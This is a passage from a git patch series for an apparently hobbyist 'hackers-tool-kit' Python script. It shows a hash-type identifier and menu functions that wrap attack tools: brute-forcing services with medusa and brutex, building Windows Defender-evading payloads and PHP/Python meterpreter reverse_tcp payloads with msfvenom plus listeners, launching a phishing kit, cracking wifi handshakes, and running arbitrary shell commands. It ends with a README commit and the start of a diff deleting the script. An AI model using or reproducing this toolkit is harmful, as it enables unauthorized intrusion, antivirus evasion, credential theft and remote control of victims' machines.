hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + +#ABOUT ME / THE CREATOR START# +#----------------------------# +def about(): + print "\033[92m------------------------------------------------------------" + print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" + print "------------------------------------------------------------" + print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" + print "------------------------------------------------------------" + print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" + print "------------------------------------------------------------" + print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" + print "------------------------------------------------------------\033[0m" +#--------------------------# +#ABOUT ME / THE CREATOR END# + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#CLEAR ALL START# +#---------------# +def clearall(): + os.system("clear") +#-------------# +#CLEAR ALL END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#PYLOAD START# +#------------# +def pyload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> pyload.rc') + os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') + os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) + os.system('echo "exploit\n" >> pyload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r pyload.rc') + os.system('rm -rf pyload.rc') + if yn == "n": + os.system('echo " "') +#----------# +#PYLOAD END# + + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "about": + about() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + if x == "pyload": + pyload() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From ed0b3c681c6c95016b2322020a574cd7e5cf9b96 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 20 May 2019 02:41:18 +0100 Subject: [PATCH 141/214] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 25d8523..96471d2 100644 --- a/README.md +++ b/README.md @@ -58,3 +58,5 @@ also added more banners * added a phpload option * added a update file + +* added python and php payload maker From b5aa91f6c0b8a2ee62bce7a5801e0e94c568150b Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 20 May 2019 03:56:14 +0100 Subject: [PATCH 142/214] Delete htk.py --- htk.py | 2833 -------------------------------------------------------- 1 file changed, 2833 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 1848a4d..0000000 --- a/htk.py +++ /dev/null @@ -1,2833 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ 